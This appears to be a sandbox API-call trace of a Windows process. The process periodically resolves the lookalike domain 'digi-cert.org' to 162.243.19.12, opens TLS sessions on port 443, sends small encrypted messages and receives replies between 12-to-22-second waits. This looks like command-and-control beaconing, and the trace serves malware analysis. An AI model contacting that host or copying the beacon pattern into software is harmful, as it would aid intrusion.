	[0419.850] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0419.851] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc6827f0
	[0419.851] CertAddCRLLinkToStore (in: hCertStore=0x233fc6827f0, pCrlContext=0x233fc67f430, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0419.851] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67f430, pTime=0x350199b4c8, hAdditionalStore=0x233fc6827f0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0419.852] CertDuplicateCertificateChain (pChainContext=0x233fc6ff590) returned 0x233fc6ff590
	[0419.853] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0419.854] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0419.855] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0419.855] CertFreeCertificateChain (pChainContext=0x233fc6ff590) 
	[0419.856] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6ff590, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0419.856] SetLastError (dwErrCode=0x0) 
	[0419.856] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6ff590, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0419.857] CertFreeCertificateChain (pChainContext=0x233fc6ff590) 
	[0419.857] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0419.858] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e4898048, MessageSeqNo=0x0 | out: pMessage=0x233e4898048) returned 0x0
	[0419.858] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fe40
	[0419.858] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fe40*=((len=0x3b, buf=0x233e4895308*), (len=0xd5, buf=0x233e4897e50*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fe40*=((len=0x3b, buf=0x233e4895308*), (len=0xd5, buf=0x233e4897e50*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0419.858] CoTaskMemFree (pv=0x233fc64fe40) 
	[0419.858] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0419.859] recv (in: s=0x7cc, buf=0x233e48981f0, len=5, flags=0 | out: buf=0x233e48981f0*) returned 5
	[0420.342] recv (in: s=0x7cc, buf=0x233e4898215, len=1488, flags=0 | out: buf=0x233e4898215*) returned 1488
	[0420.342] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48988f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48988f8, pfQOP=0x0) returned 0x0
	[0420.342] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0420.342] SetEvent (hEvent=0x6b4) returned 1
	[0420.363] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0432.369] CloseHandle (hObject=0x25c) returned 1
	[0432.738] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0432.739] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x270) returned 0x0
	[0432.740] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0432.740] RegNotifyChangeKeyValue (hKey=0x270, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x394, fAsynchronous=1) returned 0x0
	[0432.743] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x164) returned 0x0
	[0432.743] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0432.743] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0432.746] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x3c4) returned 0x0
	[0432.746] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa80
	[0432.746] RegNotifyChangeKeyValue (hKey=0x3c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa80, fAsynchronous=1) returned 0x0
	[0432.747] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa5c) returned 1
	[0432.748] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68b720
	[0432.748] WinHttpSetTimeouts (hInternet=0x233fc68b720, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0432.748] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0432.774] SetEvent (hEvent=0x6b4) returned 1
	[0432.775] select (in: nfds=0, readfds=0x233e48a02f0, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48a02f0, writefds=0x0, exceptfds=0x0) returned 1
	[0432.776] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0432.779] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0432.781] shutdown (s=0x7cc, how=2) returned 0
	[0432.786] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0432.786] closesocket (s=0x7cc) returned 0
	[0432.788] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0432.789] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa58
	[0432.789] CoTaskMemAlloc (cb=0xf) returned 0x233fc714d60
	[0432.790] getaddrinfo (in: pNodeName="digi-cert.org", pServiceName=0x0, pHints=0x350199bba0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x350199bb98 | out: ppResult=0x350199bb98*=0x233fc661830*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="digi-cert.org", ai_addr=0x233fc714dc0*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) returned 0
	[0432.830] CoTaskMemFree (pv=0x233fc714d60) 
	[0432.830] CoTaskMemFree (pv=0x0) 
	[0432.830] FreeAddrInfoW (pAddrInfo=0x233fc661830*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="楤楧挭牥⹴牯gc", ai_addr=0x233fc714dc0*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) 
	[0432.833] WSAConnect (in: s=0x7cc, name=0x233e48a1e28*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0432.947] closesocket (s=0xa58) returned 0
	[0432.948] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e489ea30, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48a26b0, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48a26b0, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0432.950] FreeContextBuffer (in: pvContextBuffer=0x233fc6865f0 | out: pvContextBuffer=0x233fc6865f0) returned 0x0
	[0432.950] send (in: s=0x7cc, buf=0x233e48a2780*, len=333, flags=0 | out: buf=0x233e48a2780*) returned 333
	[0432.950] recv (in: s=0x7cc, buf=0x233e48a2780, len=5, flags=0 | out: buf=0x233e48a2780*) returned 5
	[0433.056] recv (in: s=0x7cc, buf=0x233e48a2785, len=49, flags=0 | out: buf=0x233e48a2785*) returned 49
	[0433.057] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e489ea30, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48a29c0, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48a29e0, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48a29e0, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0433.058] recv (in: s=0x7cc, buf=0x233e48a2ad0, len=5, flags=0 | out: buf=0x233e48a2ad0*) returned 5
	[0433.058] recv (in: s=0x7cc, buf=0x233e48a2af5, len=1, flags=0 | out: buf=0x233e48a2af5*) returned 1
	[0433.059] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e489ea30, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48a2bc8, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48a2be8, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48a2be8, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0433.059] recv (in: s=0x7cc, buf=0x233e48a2cd8, len=5, flags=0 | out: buf=0x233e48a2cd8*) returned 5
	[0433.059] recv (in: s=0x7cc, buf=0x233e48a2cfd, len=48, flags=0 | out: buf=0x233e48a2cfd*) returned 48
	[0433.060] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e489ea30, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48a2e00, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48a2e20, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48a2e20, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0433.061] FreeContextBuffer (in: pvContextBuffer=0x233e399c640 | out: pvContextBuffer=0x233e399c640) returned 0x0
	[0433.062] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48a2f68 | out: pBuffer=0x233e48a2f68) returned 0x0
	[0433.062] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48a2fc0 | out: pBuffer=0x233e48a2fc0) returned 0x0
	[0433.062] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48a3028 | out: pBuffer=0x233e48a3028) returned 0x0
	[0433.063] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0433.064] CertDuplicateStore (hCertStore=0x233fc681af0) returned 0x233fc681af0
	[0433.064] CertEnumCertificatesInStore (hCertStore=0x233fc681af0, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0433.065] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0433.065] CertEnumCertificatesInStore (hCertStore=0x233fc681af0, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0433.065] CertCloseStore (hCertStore=0x233fc681af0, dwFlags=0x0) returned 1
	[0433.065] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0433.066] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc681e30
	[0433.066] CertAddCRLLinkToStore (in: hCertStore=0x233fc681e30, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0433.067] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc681e30, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0433.068] CertDuplicateCertificateChain (pChainContext=0x233fc6fec90) returned 0x233fc6fec90
	[0433.070] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0433.071] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0433.072] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0433.072] CertFreeCertificateChain (pChainContext=0x233fc6fec90) 
	[0433.072] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fec90, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0433.072] SetLastError (dwErrCode=0x0) 
	[0433.072] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fec90, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0433.072] CertFreeCertificateChain (pChainContext=0x233fc6fec90) 
	[0433.072] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0433.073] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48a5c30, MessageSeqNo=0x0 | out: pMessage=0x233e48a5c30) returned 0x0
	[0433.073] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fb40
	[0433.073] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fb40*=((len=0x3b, buf=0x233e48a2ef0*), (len=0xd5, buf=0x233e48a5a38*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fb40*=((len=0x3b, buf=0x233e48a2ef0*), (len=0xd5, buf=0x233e48a5a38*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0433.077] CoTaskMemFree (pv=0x233fc64fb40) 
	[0433.077] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0433.077] recv (in: s=0x7cc, buf=0x233e48a5dd8, len=5, flags=0 | out: buf=0x233e48a5dd8*) returned 5
	[0433.609] recv (in: s=0x7cc, buf=0x233e48a5dfd, len=1488, flags=0 | out: buf=0x233e48a5dfd*) returned 1488
	[0433.609] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48a64e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48a64e0, pfQOP=0x0) returned 0x0
	[0433.610] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0433.610] SetEvent (hEvent=0x6b4) returned 1
	[0433.638] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0455.642] CloseHandle (hObject=0x25c) returned 1
	[0455.991] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0455.992] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x164) returned 0x0
	[0455.992] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0455.993] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0455.993] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x3c4) returned 0x0
	[0455.994] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa80
	[0455.994] RegNotifyChangeKeyValue (hKey=0x3c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa80, fAsynchronous=1) returned 0x0
	[0455.996] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa5c) returned 0x0
	[0455.996] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa70
	[0455.996] RegNotifyChangeKeyValue (hKey=0xa5c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa70, fAsynchronous=1) returned 0x0
	[0455.997] GetCurrentProcess () returned 0xffffffffffffffff
	[0455.997] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa58) returned 1
	[0455.997] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68bfa0
	[0455.998] WinHttpSetTimeouts (hInternet=0x233fc68bfa0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0455.998] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0456.040] SetEvent (hEvent=0x6b4) returned 1
	[0456.041] select (in: nfds=0, readfds=0x233e48adbc8, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48adbc8, writefds=0x0, exceptfds=0x0) returned 1
	[0456.041] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0456.043] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0456.045] shutdown (s=0x7cc, how=2) returned 0
	[0456.047] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0456.047] closesocket (s=0x7cc) returned 0
	[0456.050] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0456.051] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa50
	[0456.051] WSAConnect (in: s=0x7cc, name=0x233e48af390*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0456.169] closesocket (s=0xa50) returned 0
	[0456.172] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48ac338, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48afc18, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48afc18, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0456.180] FreeContextBuffer (in: pvContextBuffer=0x233fc687b80 | out: pvContextBuffer=0x233fc687b80) returned 0x0
	[0456.180] send (in: s=0x7cc, buf=0x233e48afce8*, len=333, flags=0 | out: buf=0x233e48afce8*) returned 333
	[0456.180] recv (in: s=0x7cc, buf=0x233e48afce8, len=5, flags=0 | out: buf=0x233e48afce8*) returned 5
	[0456.285] recv (in: s=0x7cc, buf=0x233e48afced, len=49, flags=0 | out: buf=0x233e48afced*) returned 49
	[0456.285] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48ac338, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48aff28, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48aff48, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48aff48, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0456.286] recv (in: s=0x7cc, buf=0x233e48b0038, len=5, flags=0 | out: buf=0x233e48b0038*) returned 5
	[0456.286] recv (in: s=0x7cc, buf=0x233e48b005d, len=1, flags=0 | out: buf=0x233e48b005d*) returned 1
	[0456.286] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48ac338, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48b0130, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48b0150, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48b0150, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0456.286] recv (in: s=0x7cc, buf=0x233e48b0240, len=5, flags=0 | out: buf=0x233e48b0240*) returned 5
	[0456.286] recv (in: s=0x7cc, buf=0x233e48b0265, len=48, flags=0 | out: buf=0x233e48b0265*) returned 48
	[0456.286] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48ac338, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48b0368, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48b0388, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48b0388, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0456.289] FreeContextBuffer (in: pvContextBuffer=0x233e399c8e0 | out: pvContextBuffer=0x233e399c8e0) returned 0x0
	[0456.289] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48b04d0 | out: pBuffer=0x233e48b04d0) returned 0x0
	[0456.289] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48b0528 | out: pBuffer=0x233e48b0528) returned 0x0
	[0456.290] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48b0590 | out: pBuffer=0x233e48b0590) returned 0x0
	[0456.290] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0456.290] CertDuplicateStore (hCertStore=0x233fc681bc0) returned 0x233fc681bc0
	[0456.291] CertEnumCertificatesInStore (hCertStore=0x233fc681bc0, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0456.291] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0456.291] CertEnumCertificatesInStore (hCertStore=0x233fc681bc0, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0456.291] CertCloseStore (hCertStore=0x233fc681bc0, dwFlags=0x0) returned 1
	[0456.291] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0456.292] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc681e30
	[0456.292] CertAddCRLLinkToStore (in: hCertStore=0x233fc681e30, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0456.292] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc681e30, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0456.294] CertDuplicateCertificateChain (pChainContext=0x233fc6ff590) returned 0x233fc6ff590
	[0456.295] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0456.296] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0456.297] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0456.297] CertFreeCertificateChain (pChainContext=0x233fc6ff590) 
	[0456.297] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6ff590, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0456.297] SetLastError (dwErrCode=0x0) 
	[0456.297] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6ff590, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0456.298] CertFreeCertificateChain (pChainContext=0x233fc6ff590) 
	[0456.298] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0456.298] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48b3198, MessageSeqNo=0x0 | out: pMessage=0x233e48b3198) returned 0x0
	[0456.298] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fbd0
	[0456.298] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fbd0*=((len=0x3b, buf=0x233e48b0458*), (len=0xd5, buf=0x233e48b2fa0*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fbd0*=((len=0x3b, buf=0x233e48b0458*), (len=0xd5, buf=0x233e48b2fa0*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0456.298] CoTaskMemFree (pv=0x233fc64fbd0) 
	[0456.299] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0456.299] recv (in: s=0x7cc, buf=0x233e48b3340, len=5, flags=0 | out: buf=0x233e48b3340*) returned 5
	[0456.761] recv (in: s=0x7cc, buf=0x233e48b3365, len=1488, flags=0 | out: buf=0x233e48b3365*) returned 1488
	[0456.762] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48b3a48, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48b3a48, pfQOP=0x0) returned 0x0
	[0456.763] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0456.763] SetEvent (hEvent=0x6b4) returned 1
	[0456.797] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0467.801] CloseHandle (hObject=0x25c) returned 1
	[0468.172] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0468.173] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x164) returned 0x0
	[0468.174] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0468.174] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0468.175] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x3c4) returned 0x0
	[0468.175] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa80
	[0468.175] RegNotifyChangeKeyValue (hKey=0x3c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa80, fAsynchronous=1) returned 0x0
	[0468.178] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa5c) returned 0x0
	[0468.178] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa70
	[0468.178] RegNotifyChangeKeyValue (hKey=0xa5c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa70, fAsynchronous=1) returned 0x0
